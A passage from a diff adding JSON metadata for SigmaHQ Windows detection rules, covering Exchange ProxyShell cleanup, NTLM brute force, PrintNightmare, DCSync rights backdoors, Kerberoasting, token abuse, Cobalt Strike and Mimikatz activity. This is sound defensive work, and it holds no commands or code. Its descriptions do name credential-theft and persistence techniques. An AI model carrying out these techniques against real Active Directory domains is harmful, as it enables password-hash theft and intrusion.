exploit", + "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "value": "Remove Exported Mailbox from Exchange Webserver", + "meta": { + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2021/08/27", + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675", + "value": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "meta": { + "refs": [ + "https://twitter.com/OTR_Community/status/1371053369071132675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/03/15", + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml", + "author": "Jose Rodriguez @Cyb3rPandaH", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the Installation of a Exchange Transport Agent", + "uuid": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "value": "MSExchange Transport Agent Installation - Builtin", + "meta": { + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ], + "creation_date": "2021/06/08", + "filename": "win_exchange_transportagent.yml", + "author": "Tobias Michalski", + "level": "medium", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a failed installation of a Exchange Transport Agent", + "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "value": "Failed MSExchange Transport Agent Installation", + "meta": { + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ], + "creation_date": "2021/06/08", + "filename": "win_exchange_transportagent_failed.yml", + "author": "Tobias Michalski", + "level": "high", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "value": "NTLM Logon", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/1004895028995477505", + "https://goo.gl/PsqrhT", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1550.002" + ], + "creation_date": "2018/06/08", + "filename": "win_susp_ntlm_auth.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Legacy hosts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects common NTLM brute force device names", + "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "value": "NTLM Brute Force", + "meta": { + "refs": [ + "https://www.varonis.com/blog/investigate-ntlm-brute-force", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2022/02/02", + "filename": "win_susp_ntlm_brute_force.yml", + "author": "Jerry Shockley '@jsh0x'", + "level": "medium", + "falsepositive": [ + "Systems with names equal to the spoofed ones used by the brute force tools" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "value": "Potential Remote Desktop Connection to Non-Domain Host", + "meta": { + "refs": [ + "n/a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2020/05/22", + "filename": "win_susp_ntlm_rdp.yml", + "author": "James Pemberton", + "level": "medium", + "falsepositive": [ + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "value": "OpenSSH Server Listening On Socket", + "meta": { + "refs": [ + "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", + "https://winaero.com/enable-openssh-server-windows-10/", + "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", + "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.004" + ], + "creation_date": "2022/10/25", + "filename": "win_sshd_openssh_server_listening_on_socket.yml", + "author": "mdecrevoisier", + "level": "medium", + "falsepositive": [ + "Legitimate administrator activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675", + "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718", + "value": "Possible CVE-2021-1675 Print Spooler Exploitation", + "meta": { + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://twitter.com/fuzzyf10w/status/1410202370835898371", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675" + ], + "creation_date": "2021/06/30", + "filename": "win_exploit_cve_2021_1675_printspooler.yml", + "author": "Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton", + "level": "high", + "falsepositive": [ + "Problems with printer drivers" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "value": "CVE-2021-1675 Print Spooler Exploitation", + "meta": { + "refs": [ + "https://twitter.com/MalwareJake/status/1410421967463731200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675" + ], + "creation_date": "2021/07/01", + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "value": "Azure AD Health Monitoring Agent Registry Keys Access", + "meta": { + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ], + "creation_date": "2021/08/26", + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "value": "Azure AD Health Service Agents Registry Keys Access", + "meta": { + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ], + "creation_date": "2021/08/26", + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", + "value": "Access Token Abuse", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1134/001/", + "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", + "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1134.001" + ], + "creation_date": "2022/11/06", + "filename": "win_security_access_token_abuse.yml", + "author": "Michaela Adams, Zach Mathis", + "level": "medium", + "falsepositive": [ + "Anti-Virus" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", + "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "meta": { + "refs": [ + "https://twitter.com/menasec1/status/1111556090137903104", + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2019/04/03", + "filename": "win_security_account_backdoor_dcsync_rights.yml", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "level": "high", + "falsepositive": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "value": "AD Privileged Users or Groups Reconnaissance", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ], + "creation_date": "2019/04/03", + "filename": "win_security_account_discovery.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "If source account name is not an admin then its super suspicious" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects certificate creation with template allowing risk permission subject", + "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "value": "ADCS Certificate Template Configuration Vulnerability", + "meta": { + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ], + "creation_date": "2021/11/17", + "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", + "author": "Orlinum , BlueDefenZer", + "level": "low", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "meta": { + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ], + "creation_date": "2021/11/17", + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", + "author": "Orlinum , BlueDefenZer", + "level": "high", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "value": "Add or Remove Computer from DC", + "meta": { + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "win_security_add_remove_computer.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", + "value": "User with Privileges Logon", + "meta": { + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "win_security_admin_logon.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect remote login by Administrator user (depending on internal pattern).", + "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "value": "Admin User Remote Logon", + "meta": { + "refs": [ + "https://car.mitre.org/wiki/CAR-2016-04-005", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1078.001", + "attack.t1078.002", + "attack.t1078.003", + "car.2016-04-005" + ], + "creation_date": "2017/10/29", + "filename": "win_security_admin_rdp_login.yml", + "author": "juju4", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects access to $ADMIN share", + "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", + "value": "Access to ADMIN$ Share", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2017/03/04", + "filename": "win_security_admin_share_access.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects WRITE_DAC access to a domain object", + "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "value": "AD Object WriteDAC Access", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ], + "creation_date": "2019/09/12", + "filename": "win_security_ad_object_writedac_access.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "uuid": "17d619c1-e020-4347-957e-1d1207455c93", + "value": "Active Directory Replication from Non Machine Account", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ], + "creation_date": "2019/07/26", + "filename": "win_security_ad_replication_non_machine_account.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects access to a domain user from a non-machine account", + "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", + "value": "AD User Enumeration", + "meta": { + "refs": [ + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", + "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ], + "creation_date": "2020/03/30", + "filename": "win_security_ad_user_enumeration.yml", + "author": "Maxime Thiebaut (@0xThiebaut)", + "level": "medium", + "falsepositive": [ + "Administrators configuring new users." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "value": "Enabled User Right in AD to Control User Objects", + "meta": { + "refs": [ + "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2017/07/30", + "filename": "win_security_alert_active_directory_user_control.yml", + "author": "@neu5ron", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "value": "Active Directory User Backdoors", + "meta": { + "refs": [ + "https://msdn.microsoft.com/en-us/library/cc220234.aspx", + "https://adsecurity.org/?p=3466", + "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ], + "creation_date": "2017/04/13", + "filename": "win_security_alert_ad_user_backdoors.yml", + "author": "@neu5ron", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "value": "Weak Encryption Enabled and Kerberoast", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2053", + "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2017/07/30", + "filename": "win_security_alert_enable_weak_encryption.yml", + "author": "@neu5ron", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "uuid": "24549159-ac1b-479c-8175-d42aea947cae", + "value": "Hacktool Ruler", + "meta": { + "refs": [ + "https://github.com/sensepost/ruler", + "https://github.com/sensepost/ruler/issues/47", + "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ], + "creation_date": "2017/05/31", + "filename": "win_security_alert_ruler.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Go utilities that use staaldraad awesome NTLM library" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "value": "Chafer Activity - Security", + "meta": { + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/03/23", + "filename": "win_security_apt_chafer_mar18_security.yml", + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "value": "Defrag Deactivation - Security", + "meta": { + "refs": [ + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ], + "creation_date": "2019/03/04", + "filename": "win_security_apt_slingshot.yml", + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "value": "Operation Wocao Activity - Security", + "meta": { + "refs": [ + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ], + "creation_date": "2019/12/20", + "filename": "win_security_apt_wocao.yml", + "author": "Florian Roth, frack113", + "level": "high", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "value": "Remote Task Creation via ATSVC Named Pipe", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ], + "creation_date": "2019/04/03", + "filename": "win_security_atsvc_task.yml", + "author": "Samir Bousseaden", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "value": "Processes Accessing the Microphone and Webcam", + "meta": { + "refs": [ + "https://twitter.com/duzvik/status/1269671601852813320", + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ], + "creation_date": "2020/06/07", + "filename": "win_security_camera_microphone_access.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "value": "CobaltStrike Service Installations - Security", + "meta": { + "refs": [ + "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2021/05/26", + "filename": "win_security_cobaltstrike_service_installs.yml", + "author": "Florian Roth, Wojciech Lesicki", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "value": "DCERPC SMB Spoolss Named Pipe", + "meta": { + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2018/11/28", + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", + "author": "OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Domain Controllers acting as printer servers too? :)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ], + "creation_date": "2020/10/12", + "filename": "win_security_dcom_iertutil_dll_hijack.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Mimikatz DC sync security events", + "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "value": "Mimikatz DC Sync", + "meta": { + "refs": [ + 